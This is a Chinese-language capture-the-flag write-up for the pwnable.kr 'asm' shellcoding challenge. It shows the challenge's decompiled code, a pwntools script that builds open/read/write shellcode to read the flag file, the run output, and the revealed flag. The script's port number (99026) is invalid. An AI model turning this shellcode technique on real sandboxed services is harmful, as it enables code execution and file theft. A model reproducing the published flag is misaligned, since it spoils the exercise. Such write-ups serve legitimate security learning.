question 1 2 3 Mommy! I think I know how to make shellcodes ssh asm@pwnable.kr -p2222 (pw: guest)
analyse 拖入ida伪代码可以看到
1 2 3 4 5 6 7 8 9 10 11 12 13 14 puts("Welcome to shellcoding practice challenge."); puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox."); puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only."); puts("If this does not challenge you. you should play 'asg' challenge :)"); s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL); memset(s, 144, 0x1000uLL); v4 = strlen(stub); memcpy(s, stub, v4); printf("give me your x64 shellcode: ", stub, argv); read(0, s + 46, 0x3E8uLL); alarm(0xAu); chroot("/home/asm_pwn"); sandbox("/home/asm_pwn"); ((void (*)(void))s)();
也就是要求我们自己写shellcode,来实现读取flag的操作,注意,只能使用open,read,write三个系统函数。
本来网站http://syscalls.kernelgrok.com/可以查调用表的,不过好像因为维护上不去,所以我用它的github项目部署了一下http://syscall.ycdxsb.cn/
这里为了方便些shellcode,我们可以用pwntools的shellcraft模块编写http://docs.pwntools.com/en/stable/shellcraft/amd64.html
首先我们需要将函数名push到栈中
1 2 3 4 filename = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong' payload = '' payload += shellcraft.amd64.pushstr(filename)
由于是push进去的,所以这个时候rsp存的就是函数名,接着我们使用open打开这个文件
1 payload += shellcraft.amd64.open('rsp',0,0)
由于是封装好了,所以这里的参数和实际的open函数参数一致
对于64位函数,执行完后的返回值就在rax中,也就是我们open函数的fd值在rax中,然后我们需要使用read函数将内容读到rsp指向的内存中,如下
1 payload += shellcraft.amd64.read('rax','rsp',100)
最后使用write函数将rsp内容输出到屏幕上
1 payload += shellcraft.amd64.write(1,'rsp',100)
get flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import * context(arch='amd64',os='linux') #p = process('asm') p = remote('127.0.0.1',99026) filename = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong' payload = '' payload += shellcraft.amd64.pushstr(filename) payload += shellcraft.amd64.open('rsp',0,0) payload += shellcraft.amd64.read('rax','rsp',100) payload += shellcraft.amd64.write(1,'rsp',100) p.recvuntil('shellcode: ') p.sendline(asm(payload)) print p.recv()
1 2 3 4 5 [DEBUG] Received 0x64 bytes: 'Mak1ng_shelLcodE_i5_veRy_eaSy\n' 'lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo' Mak1ng_shelLcodE_i5_veRy_eaSy lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo
flag:Mak1ng_shelLcodE_i5_veRy_eaSy
